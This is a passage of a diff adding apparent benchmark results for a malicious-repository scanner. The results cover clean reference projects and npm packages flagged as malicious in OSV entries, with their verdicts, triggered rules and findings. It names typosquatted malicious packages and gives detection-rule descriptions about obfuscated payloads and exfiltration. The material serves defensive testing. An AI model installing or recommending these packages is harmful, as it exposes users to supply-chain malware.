"type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "Doc/_static/tachyon-example-flamegraph.html", + "line": 9, + "description": "Extremely long line detected (279,572 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 9 (279,572 chars, contains suspicious code), Line 61 (58,594 chars, contains suspicious code), Line 64 (37,721 chars, contains suspicious code)" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "Doc/_static/tachyon-example-heatmap.html", + "line": 1993, + "description": "Extremely long line detected (199,608 characters). Malicious code may be hidden far to the right. Affected: Line 1993 (199,608 chars)" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "Lib/_colorize.py", + "line": 16, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "Lib/_pyrepl/terminfo.py", + "line": 125, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "Lib/_pyrepl/windows_console.py", + "line": 116, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "Lib/_pyrepl/windows_eventqueue.py", + "line": 10, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "Doc/_static/tachyon-example-flamegraph.html", + "line": 2518, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "Lib/_aix_support.py", + "line": 45, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "Lib/_pyrepl/windows_console.py", + "line": 173, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "unspecified", + "type": "CODE_INTEGRITY_ISSUE", + "rule": "CODE_INTEGRITY_ISSUE", + "file": "Doc/_static/tachyon-example-flamegraph.html", + "line": null, + "description": "Minified/obfuscated code detected in source repository" + } + ], + "filesScanned": 200, + "filesSkipped": 5803, + "treeTruncated": false, + "durationMs": 8848, + "error": "" + }, + { + "sampleId": "noisy-django-django", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/django/django", + "immutableRef": "bdbda29c3e126754c3ae04ceb5c5d35d49aae01c", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 6874, + "treeTruncated": false, + "durationMs": 3394, + "error": "" + }, + { + "sampleId": "noisy-ansible-ansible", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/ansible/ansible", + "immutableRef": "8d63341579aa1c62024f3bce1a8af3f9a1b22a16", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 0.9, + "safeToClone": false, + "rulesTriggered": [ + "HIDDEN_FILE", + "NETWORK_COMMUNICATION", + "HARDCODED_SECRETS" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "high", + "confidence": "unspecified", + "type": "HIDDEN_FILE", + "rule": "HIDDEN_FILE", + "file": ".azure-pipelines/commands/powershell.sh", + "line": null, + "description": "Suspicious hidden file: .azure-pipelines/commands/powershell.sh" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "lib/ansible/_internal/_powershell/_clixml.py", + "line": 182, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "HARDCODED_SECRETS", + "rule": "HARDCODED_SECRETS", + "file": "lib/ansible/cli/__init__.py", + "line": null, + "description": "Hardcoded credentials detected: Password" + } + ], + "filesScanned": 200, + "filesSkipped": 5591, + "treeTruncated": false, + "durationMs": 4242, + "error": "" + }, + { + "sampleId": "noisy-scrapy-scrapy", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/scrapy/scrapy", + "immutableRef": "c9446931a80e63ea1d77e130ea5581b547e0f51b", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 432, + "treeTruncated": false, + "durationMs": 3348, + "error": "" + }, + { + "sampleId": "noisy-pallets-flask", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/pallets/flask", + "immutableRef": "36e4a824f340fdee7ed50937ba8e7f6bc7d17f81", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 107, + "filesSkipped": 129, + "treeTruncated": false, + "durationMs": 3017, + "error": "" + }, + { + "sampleId": "noisy-rust-lang-rust", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/rust-lang/rust", + "immutableRef": "5503df87342a73d0c29126a7e08dc9c1255c46ad", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "high", + "actualScore": 1, + "safeToClone": false, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "SUSPICIOUS_FILE_ACCESS", + "NETWORK_COMMUNICATION", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "src/ci/docker/host-x86_64/dist-x86_64-netbsd/build-netbsd-toolchain.sh", + "line": 45, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "compiler/rustc_codegen_cranelift/.github/scripts/free-disk-space.sh", + "line": 238, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "src/ci/docker/scripts/illumos-toolchain.sh", + "line": 85, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "high", + "confidence": "unspecified", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "src/ci/docker/scripts/ohos-sdk.sh", + "line": 6, + "description": "Suspicious network communication detected: Hardcoded IP Address (3 occurrences)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "src/ci/docker/scripts/solaris-toolchain.sh", + "line": 112, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "src/ci/scripts/free-disk-space-linux.sh", + "line": 313, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "src/ci/scripts/install-clang.sh", + "line": 53, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "src/librustdoc/html/static/js/main.js", + "line": 459, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "src/librustdoc/html/static/js/search.js", + "line": 5406, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "src/tools/clippy/util/gh-pages/script.js", + "line": 341, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 60050, + "treeTruncated": true, + "durationMs": 4947, + "error": "" + }, + { + "sampleId": "noisy-golang-go", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/golang/go", + "immutableRef": "03845e30f7b73d1703bd8c21017297f6eecb76d6", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 15414, + "treeTruncated": false, + "durationMs": 3504, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2024-8862", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2024-8862; report blob cebceb18d12edabb3bf055a6936a367b0614e792", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/bcrypts-js/MAL-2024-8862.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:cebceb18d12edabb3bf055a6936a367b0614e792:7c7ee68d6f6b26b48726c11558dc9206bf998cf9", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0.25, + "safeToClone": true, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "unspecified", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: bcrypts-js" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2024-1377", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2024-1377; report blob c78863fed3a5a3b662b72b05c16b77d9dc153665", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/cors-parser/MAL-2024-1377.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:c78863fed3a5a3b662b72b05c16b77d9dc153665:3e4eb5c422572ea85c1fff43d7e1f202899068b3", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "unspecified", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: cors-parser" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-19413", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-19413; report blob 84b9fce13d64dd7ec790910850e9fbbbf58cf348", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/electorn/MAL-2025-19413.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:84b9fce13d64dd7ec790910850e9fbbbf58cf348:d511c4332bf47892ca7bf08a3ad5e06ccc7224fb", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0.25, + "safeToClone": true, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "unspecified", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: electorn" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-20690", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-20690; report blob 2fdd79a99598980c7c4cbaad70833538b602a95c", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/flatmap-stream/MAL-2025-20690.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:2fdd79a99598980c7c4cbaad70833538b602a95c:faa25eec2f63ebf17e74b3d3dad492afa2bdc214", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "unspecified", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: flatmap-stream" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-25502", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-25502; report blob 67e0222164b6b5f6ec72ce58d7a20b430cac4dd2", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/lodahs/MAL-2025-25502.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:67e0222164b6b5f6ec72ce58d7a20b430cac4dd2:5ee45d530dcca44dea28a23994dbcdbecfc63f8e", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": true, + "verdictPass": false, + "actualVerdict": "medium", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY", + "TYPOSQUAT_PACKAGE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "unspecified", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: lodahs" + }, + { + "severity": "medium", + "confidence": "unspecified", + "type": "TYPOSQUAT_PACKAGE", + "rule": "TYPOSQUAT_PACKAGE", + "file": "package.json", + "line": null, + "description": "Possible typosquat of \"lodash\": lodahs" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-4275", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-4275; report blob 238dc228cd9cf54efea67c07f9bc7089b15207b4", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios.js/MAL-2025-4275.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:238dc228cd9cf54efea67c07f9bc7089b15207b4:e015c3138480f5286955833abfb3bea47471688d", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2026-4493", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2026-4493; report blob 366383ef9f8518dfc534b911251a2dbe5ccd3928", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axiosqqq/MAL-2026-4493.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:366383ef9f8518dfc534b911251a2dbe5ccd3928:bb3d39dbc3518a28407d264f2abcf070c3a3657b", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15242", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15242; report blob 5850d1f4f2806fd59eb535b3e4d45beb058bc826", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axioss/MAL-2025-15242.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:5850d1f4f2806fd59eb535b3e4d45beb058bc826:81363d511fb327ca5616ccfcba7c5393e1a0044c", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0.15, + "safeToClone": true, + "rulesTriggered": [ + "TYPOSQUAT_PACKAGE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "unspecified", + "type": "TYPOSQUAT_PACKAGE", + "rule": "TYPOSQUAT_PACKAGE", + "file": "package.json", + "line": null, + "description": "Possible typosquat of \"axios\": axioss" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15281", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15281; report blob e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-laoder/MAL-2025-15281.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472:7ae13db475be04ecc7d2b6fcef3b20c40bbc2e03", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15282", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15282; report blob b23f507de17d8c239290fb1c36a5d9a6d886b92c", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loadre/MAL-2025-15282.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b23f507de17d8c239290fb1c36a5d9a6d886b92c:cb4b464cf4c2449f6ad3903bd3e62fbe9c7579dd", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15283", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15283; report blob a98eafc3406e034fe14c4e2fe25edc21ee7e9a47", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loqder/MAL-2025-15283.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:a98eafc3406e034fe14c4e2fe25edc21ee7e9a47:b2eee8c6fb943b5b47deffd77c116865d4d2ddee", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15286", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15286; report blob 7d72739e67fda4b48cc77bfcb6c868feafd17567", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-node/MAL-2025-15286.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:7d72739e67fda4b48cc77bfcb6c868feafd17567:9b2980f27303a4070b0e103b0621839940ee9724", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15289", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15289; report blob 283dd8d75b91d4a35c89707bd10115e3d2ff9c69", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-pal/MAL-2025-15289.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:283dd8d75b91d4a35c89707bd10115e3d2ff9c69:55744bedf6294386bdc1eec2313e9b485a77322f", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15238", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15238; report blob aceadeea25bc4b32b766096204db12a15315e090", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-http/MAL-2025-15238.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:aceadeea25bc4b32b766096204db12a15315e090:30af885d0884dd6cec7fdbfb7ba0a3248110b517", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2023-116", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2023-116; report blob 0d58b457e7175cc230bff6d7b6da40d3781a5466", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-proxy/MAL-2023-116.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:0d58b457e7175cc230bff6d7b6da40d3781a5466:216fcbc2c9356dbccfd103971f088bcb84682b06", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-4813", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-4813; report blob bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-browserify/MAL-2025-4813.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392:2bae461ccd66abc5ecc0082b8681a81c125302b6", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": false, + "categoryDetected": false, + "verdictPass": false, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-190832", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-190832; report blob b9b988a111a6e0915333f4b29ce75fb1fe05f293", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-builder/MAL-2025-190832.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b9b988a111a6e0915333f4b29ce75fb1fe05f293:6ac5ebe76f27904cfdec2d27badfa7ad53d6f11d", + 